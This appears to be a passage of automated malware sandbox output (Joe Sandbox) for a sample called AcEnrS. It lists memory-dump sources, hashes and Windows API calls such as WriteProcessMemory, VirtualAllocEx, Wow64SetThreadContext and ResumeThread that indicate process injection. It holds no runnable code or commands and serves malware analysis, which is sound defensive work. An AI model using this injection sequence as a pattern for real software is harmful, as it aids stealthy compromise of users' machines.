                                                                                • Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 942bed4c15c2d807af683ca533c76cf2312f11f30b3fbc1d947fcaa774349215
                                                                                • Instruction ID: 8cf60f84f55e4d7615c4ac93f39b0ab7a2757388bd0bf8788df56ce89babd32b
                                                                                • Opcode Fuzzy Hash: 942bed4c15c2d807af683ca533c76cf2312f11f30b3fbc1d947fcaa774349215
                                                                                • Instruction Fuzzy Hash: C641BFB0C00B1DCBDB24DFA9C884B9DBBF5BF49304F20816AD508AB255DB75694ACF91

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 569 9014719-901476e 571 9014770-901477c 569->571 572 901477e-90147bd WriteProcessMemory 569->572 571->572 574 90147c6-90147f6 572->574 575 90147bf-90147c5 572->575 575->574
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 090147B0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: fdd7fcfea8d778e8c4de368a1ef8cb4b937c9675d258d559cd0046f5460a9437
                                                                                • Instruction ID: e4519f5d0b34eca6b359d68f846e620288efdaa9123a0dba1d477ebcbe27513c
                                                                                • Opcode Fuzzy Hash: fdd7fcfea8d778e8c4de368a1ef8cb4b937c9675d258d559cd0046f5460a9437
                                                                                • Instruction Fuzzy Hash: 2B2126B59003498FDF10CFA9C9857EEBBF1FF48310F10882AE959A7250C7789585CBA0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 579 9014720-901476e 581 9014770-901477c 579->581 582 901477e-90147bd WriteProcessMemory 579->582 581->582 584 90147c6-90147f6 582->584 585 90147bf-90147c5 582->585 585->584
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 090147B0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: e7196cd6e5d62671828d72ec029188fd234a4ef92dddfc6cc8d8d2e7d92ca2b2
                                                                                • Instruction ID: 3d74b5acffbb82f401bf933375102da00bb39ef964dd22fa94703ae7d441e065
                                                                                • Opcode Fuzzy Hash: e7196cd6e5d62671828d72ec029188fd234a4ef92dddfc6cc8d8d2e7d92ca2b2
                                                                                • Instruction Fuzzy Hash: 75211B75D003599FDB10DFA9C885BDEBBF5FF48310F108429E519A7250C7789544CBA4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 589 9014808-901489d ReadProcessMemory 592 90148a6-90148d6 589->592 593 901489f-90148a5 589->593 593->592
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09014890
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 01ab2b43973ecc4b658dab0ac741a7270b1927a99a53b8ed0ec77181c0f8f362
                                                                                • Instruction ID: b91dad6a16cf118011f10018b24583f22147f52c7d3e53b458b34e91f3aa1e9e
                                                                                • Opcode Fuzzy Hash: 01ab2b43973ecc4b658dab0ac741a7270b1927a99a53b8ed0ec77181c0f8f362
                                                                                • Instruction Fuzzy Hash: 1F2139B5C003499FCB10DFA9C981AEEFBF5FF48310F10882AE559A7250C7789545CBA1
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09014890
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: b5099863ebbf656ff2e090d7ceca0812eee3405f5f7f154129415ba66b1d434c
                                                                                • Instruction ID: 827d809929493f82d86aaaf9500409db7789f3d1ef5bdeb25da212b4bae29392
                                                                                • Opcode Fuzzy Hash: b5099863ebbf656ff2e090d7ceca0812eee3405f5f7f154129415ba66b1d434c
                                                                                • Instruction Fuzzy Hash: D2213AB1C003499FCB10DFAAC884AEEFBF5FF48310F10882AE519A7250C7789544CBA0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 597 9014582-90145d3 599 90145e3-9014613 Wow64SetThreadContext 597->599 600 90145d5-90145e1 597->600 602 9014615-901461b 599->602 603 901461c-901464c 599->603 600->599 602->603
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09014606
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: dc8e35f8110eb3e09ea48e30da3c47e7cf4f83294ee3d275c3932354256e05cd
                                                                                • Instruction ID: 2ac98451903c51f210c6bd2c67d1dae2eaf3dfd26b8a8ca6e418693f198b7273
                                                                                • Opcode Fuzzy Hash: dc8e35f8110eb3e09ea48e30da3c47e7cf4f83294ee3d275c3932354256e05cd
                                                                                • Instruction Fuzzy Hash: 442154B5D003098FCB10DFAAC4857EEBBF0EF88314F14882AD459A7251CB789985CFA1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 607 9014588-90145d3 609 90145e3-9014613 Wow64SetThreadContext 607->609 610 90145d5-90145e1 607->610 612 9014615-901461b 609->612 613 901461c-901464c 609->613 610->609 612->613
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09014606
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: c3ced05aacc240807413755f46c9d52868f0a0fcec3967757b9591c2e4110114
                                                                                • Instruction ID: 6decb2a82b6ca8e0816de7a321f2c35b9b8cf0cfb39cfda27af1ad0d9d96f962
                                                                                • Opcode Fuzzy Hash: c3ced05aacc240807413755f46c9d52868f0a0fcec3967757b9591c2e4110114
                                                                                • Instruction Fuzzy Hash: AE2135B1D003098FDB10DFAAC4857EEBBF4EF88314F10842AD419A7251CB78A985CFA5
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B4D717
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 66bae7282d81db2e34566f380bc16daa1f1dde2c22aa5850208e94cf1d4d5387
                                                                                • Instruction ID: 62a02fd36c30f56a1813069cc3412cb00f3bb0fd7218c822e9709117466b93ae
                                                                                • Opcode Fuzzy Hash: 66bae7282d81db2e34566f380bc16daa1f1dde2c22aa5850208e94cf1d4d5387
                                                                                • Instruction Fuzzy Hash: B121C4B59002489FDB10CF9AD584ADEBBF9FB48310F14845AE918A3350D378A954CFA5
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B4D717
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 1451fffe61e45a8e22ec5d4c5ca6c927b88cd5223a094438923539d2e32b0246
                                                                                • Instruction ID: a86f603c750bde9406b5d87165ce286c87996339093ae4191031f779784780cc
                                                                                • Opcode Fuzzy Hash: 1451fffe61e45a8e22ec5d4c5ca6c927b88cd5223a094438923539d2e32b0246
                                                                                • Instruction Fuzzy Hash: 7521E2B5900248DFDB10CFAAD584AEEBBF5FB48314F14801AE918A7350C378A944CFA4
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 090146CE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: c5bbb56beba6bfdde08d12291f78c4aca0409e7bfd550c9eb85731c579684a03
                                                                                • Instruction ID: 901cfcb01fed154b0790c5c489319edf71413e3eda820512c1cdd280f817731f
                                                                                • Opcode Fuzzy Hash: c5bbb56beba6bfdde08d12291f78c4aca0409e7bfd550c9eb85731c579684a03
                                                                                • Instruction Fuzzy Hash: D31156B59002488FCB10DFA9C4456EEBFF5EF48314F20881AE559A7250C739A545CBA0
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 090146CE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 2c14fb3d55b13e3f0272dc436910fb1a32aa7456ddcdc0c8015fa8fc466f0a4b
                                                                                • Instruction ID: 8bd39d160433060daa70c1114de1f1ec285cc25dcd214ae0373182d68233e3ea
                                                                                • Opcode Fuzzy Hash: 2c14fb3d55b13e3f0272dc436910fb1a32aa7456ddcdc0c8015fa8fc466f0a4b
                                                                                • Instruction Fuzzy Hash: ED1137759002499FCB10DFAAC844AEEBFF5EF48714F108819E519A7250CB79A544CFA1
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: da221dc63db3a52b1f8b457570b30f1537e9b31f741c8448360a3c917e6f65db
                                                                                • Instruction ID: c06f9f8efde00334805da392e01028a9a809dae8be492bb404736b01b3fcd57f
                                                                                • Opcode Fuzzy Hash: da221dc63db3a52b1f8b457570b30f1537e9b31f741c8448360a3c917e6f65db
                                                                                • Instruction Fuzzy Hash: E51136B5D002488FDB10DFAAC4457EEFBF5EF48314F24881AD519A7250CB38A545CFA4
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 00b8fdebae5d073be3128f6c2c74ac0c46c1a5de3d36e3401c02ac56a01f7ce0
                                                                                • Instruction ID: e3019397634dd3e1fbaf44b15a58cfad5a75a7497e83a700c7281bf72032bb03
                                                                                • Opcode Fuzzy Hash: 00b8fdebae5d073be3128f6c2c74ac0c46c1a5de3d36e3401c02ac56a01f7ce0
                                                                                • Instruction Fuzzy Hash: 341125B1D002488BCB20DFAAC4457EEFBF5EF88724F208819D519A7250CB79A945CBA4
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00B4AFFE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110852234.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_b40000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: f03bcb38c39726266abf78a33cfd26307564f7832bbd4590a0b8470c54b28f19
                                                                                • Instruction ID: 3f65d356be77d5921bd29f220d3b41e9117aadc77b7ec589b11ea7ab9eb281dc
                                                                                • Opcode Fuzzy Hash: f03bcb38c39726266abf78a33cfd26307564f7832bbd4590a0b8470c54b28f19
                                                                                • Instruction Fuzzy Hash: F31110B6C003498FCB10CF9AC444ADEFBF4EF88314F10846AD928A7610C379A645CFA1
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 09017F3D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: 50fe57801d9b6863d1fc9f3e7a23957f72d65cb320c51c8dd8f07e56d6afcb26
                                                                                • Instruction ID: 2405a0fc1167dd127720c952fb5ee47d67db0407c9c459e138ab1658a17c8a22
                                                                                • Opcode Fuzzy Hash: 50fe57801d9b6863d1fc9f3e7a23957f72d65cb320c51c8dd8f07e56d6afcb26
                                                                                • Instruction Fuzzy Hash: 0911F2B5800348DFDB10DF9AC889BEEBBF8EB48314F108819E558A7200C379A944CFA5
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 09017F3D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: 5ab8a02d5368c1fd074415263afa85faaefe55031a96f0b3f0e05193979ef234
                                                                                • Instruction ID: bd4cc543d503f403b1fe50984ae62aaea19b95b28c73ee503db6bd7af31eb839
                                                                                • Opcode Fuzzy Hash: 5ab8a02d5368c1fd074415263afa85faaefe55031a96f0b3f0e05193979ef234
                                                                                • Instruction Fuzzy Hash: CD1100B98003488FDB10DF99C585BDEBFF8FB48314F20881AE558A3200C379A584CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110056558.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7bd000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d135491a28640cdc6b0c84c74348062b7e9c3d62b6858eae0a2d8888bb3370e7
                                                                                • Instruction ID: 769b61b43a111f42d11be76e557e33558b7e16c0263a06c476a61acd39776f1e
                                                                                • Opcode Fuzzy Hash: d135491a28640cdc6b0c84c74348062b7e9c3d62b6858eae0a2d8888bb3370e7
                                                                                • Instruction Fuzzy Hash: 582121B1100284DFCB25DF14C9C0B66BF65FB98324F20C569ED090B256D33EEC06CAA2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110056558.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7bd000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 986da1b07ddc21950c7c045e7f6c23e4b63036088990d3ed5ed7cc7d4eda8858
                                                                                • Instruction ID: 2ca7efd5adad3d899540a4983dfd0770bb5e03f1638046642df594da84d80d4d
                                                                                • Opcode Fuzzy Hash: 986da1b07ddc21950c7c045e7f6c23e4b63036088990d3ed5ed7cc7d4eda8858
                                                                                • Instruction Fuzzy Hash: 382100B1500244DFCB25DF14D9C0F66BF65FF98318F20C569E9090B256D33ADC26DAA2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110645860.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_acd000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6f604e262491ca05cd32ce5ae87f69f844d00ba8856faf7edbe3d18a50482ec7
                                                                                • Instruction ID: c77ec993e05cba6791420f529ddcb65ec817d1b6d5c346f168420cf43e3dc5b7
                                                                                • Opcode Fuzzy Hash: 6f604e262491ca05cd32ce5ae87f69f844d00ba8856faf7edbe3d18a50482ec7
                                                                                • Instruction Fuzzy Hash: 0A21D075604204EFCB14DF28D984F26BFA5FB88314F20C57DD94A4B296C33AD807CA62
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110645860.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_acd000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f7e2b68da844d8805b9334ebb9972e6009d08079dd8c2276c965d87483ae4525
                                                                                • Instruction ID: f6218b5563d2ff2f4df1068c2c59886c36c7bf632f4ebf715e84dca399f860d7
                                                                                • Opcode Fuzzy Hash: f7e2b68da844d8805b9334ebb9972e6009d08079dd8c2276c965d87483ae4525
                                                                                • Instruction Fuzzy Hash: 9A2180755093808FCB02CF24D994B15BF71EB46314F29C5EED8498F6A7C33A980ACB62
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110056558.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7bd000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction ID: 7a434b1f62f5b207993b5b181437445998d333b09beec4ae2a346f211e45cd9c
                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction Fuzzy Hash: AE112672404280CFCB22CF10D5C4B56BF72FF98314F24C6A9D8490B256C33AD86ACBA2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2110056558.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7bd000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction ID: 7abddb45a6cc6b759e1eed7b3dd9357c3956b1c4a4d3fcfee1e0f3f433182eb3
                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction Fuzzy Hash: 51112672404280CFCB12CF00D5C4B56BF72FB94324F24C6A9DD090B256C33AE85ACBA2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
                                                                                • API String ID: 0-499371476
                                                                                • Opcode ID: 1c50f25504c5171b75e573540954fc99c14363edefe70895e5cc28a3fc24eadc
                                                                                • Instruction ID: 3590df37b4178c6432e96b1c0df9abd25a6f0156f7c284e135dac15e46b7f0bf
                                                                                • Opcode Fuzzy Hash: 1c50f25504c5171b75e573540954fc99c14363edefe70895e5cc28a3fc24eadc
                                                                                • Instruction Fuzzy Hash: 2E420662D4D3C19FDB5386784CB91DB7FF19F53600B1A44EFC8C282296E968A447E722
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Xaq$$]q
                                                                                • API String ID: 0-1280934391
                                                                                • Opcode ID: 91a40cfae22835488aeb459d2b30cd4a195082262617028b51a41e40a7c2eb4c
                                                                                • Instruction ID: 9ea5a5809ff0c4cea876672592c9606dccf074ef39dc8722928250e96ffbe554
                                                                                • Opcode Fuzzy Hash: 91a40cfae22835488aeb459d2b30cd4a195082262617028b51a41e40a7c2eb4c
                                                                                • Instruction Fuzzy Hash: C8F19C74F04249CFCB08EFB9C8946AEBBB2FF88700B14856DE406AB354CB359846DB51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LR]q
                                                                                • API String ID: 0-3081347316
                                                                                • Opcode ID: d2715159b6c57e27e9a5e7c796b6df4ee88a8d86764d1bf2c0b09b781bee6f01
                                                                                • Instruction ID: 17b1b527b2cb15cc1da5ca03d8429478b58719d60d9bf71cb804b0a74f463ab2
                                                                                • Opcode Fuzzy Hash: d2715159b6c57e27e9a5e7c796b6df4ee88a8d86764d1bf2c0b09b781bee6f01
                                                                                • Instruction Fuzzy Hash: F2528574A01219CFCB64EF64ED94A9DBBB6FF48301F1085A5D409A7368DB346E86DF80
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 250843b7d5d8ac65a3463b43dabf0c3e33f6ba9132321c26709b3cef60f7b67e
                                                                                • Instruction ID: f17dab8d2084d3b6d2571fbef8f4b3d0cc5834b53baf63c126764645f80994e4
                                                                                • Opcode Fuzzy Hash: 250843b7d5d8ac65a3463b43dabf0c3e33f6ba9132321c26709b3cef60f7b67e
                                                                                • Instruction Fuzzy Hash: AA51AA74E01308CFCB48DFA9D99499DBBF2FF89300B208469E405AB364DB35A946CF50
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b3b9867dcfd26e00e85f2aeba55f92d240f16e6724b6b7c6e5248641e27d67e1
                                                                                • Instruction ID: a433b313ad6b3456862c8d46d0f35f972e98383e832a4816dc1202af5d086c0e
                                                                                • Opcode Fuzzy Hash: b3b9867dcfd26e00e85f2aeba55f92d240f16e6724b6b7c6e5248641e27d67e1
                                                                                • Instruction Fuzzy Hash: C8218E35E001059FCB64EF68D840AEE37A5EBA9364F208459D80A9B240DB34FE47DBD2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e3176f90d343e6becaa87e50be520bcc5bf33f4947140f2cd32daf8987c6089
                                                                                • Instruction ID: c7b2b779ed2dd2bfb12300e5f7f7166ddc2306c64b81ab10901fd62eaf798ce8
                                                                                • Opcode Fuzzy Hash: 9e3176f90d343e6becaa87e50be520bcc5bf33f4947140f2cd32daf8987c6089
                                                                                • Instruction Fuzzy Hash: 0E31A678E11209CFCB54EFA8D99499DBBF2FF49304B208469E819AB365D735AD06CF40
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 62fc0a1714483c2d80f342ed7104f287ca0af7f8a5bd5e28962cb27b2cd61b14
                                                                                • Instruction ID: 3a7479c752e41ba3b6c9ae575e59b0a3afb8ea9b8627e378d7fb65fe5137b609
                                                                                • Opcode Fuzzy Hash: 62fc0a1714483c2d80f342ed7104f287ca0af7f8a5bd5e28962cb27b2cd61b14
                                                                                • Instruction Fuzzy Hash: 8811C0B4D0060A8FCF40EFA9D9845EEBBF4FF09304F10452AD909B2214EB355A85CFA1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 69bf914b9b7ecdb3d4919239f17c952dd1db135a9da646b72a290725735eab10
                                                                                • Instruction ID: 90d8239c73c71bc798a5dbb5fb963e3b69f47fdb56945e998d87f80503d64ed1
                                                                                • Opcode Fuzzy Hash: 69bf914b9b7ecdb3d4919239f17c952dd1db135a9da646b72a290725735eab10
                                                                                • Instruction Fuzzy Hash: C8E02031D54356CBC712D7F09C140EEBB34EDC6211708455BC0A537051EB30261AC352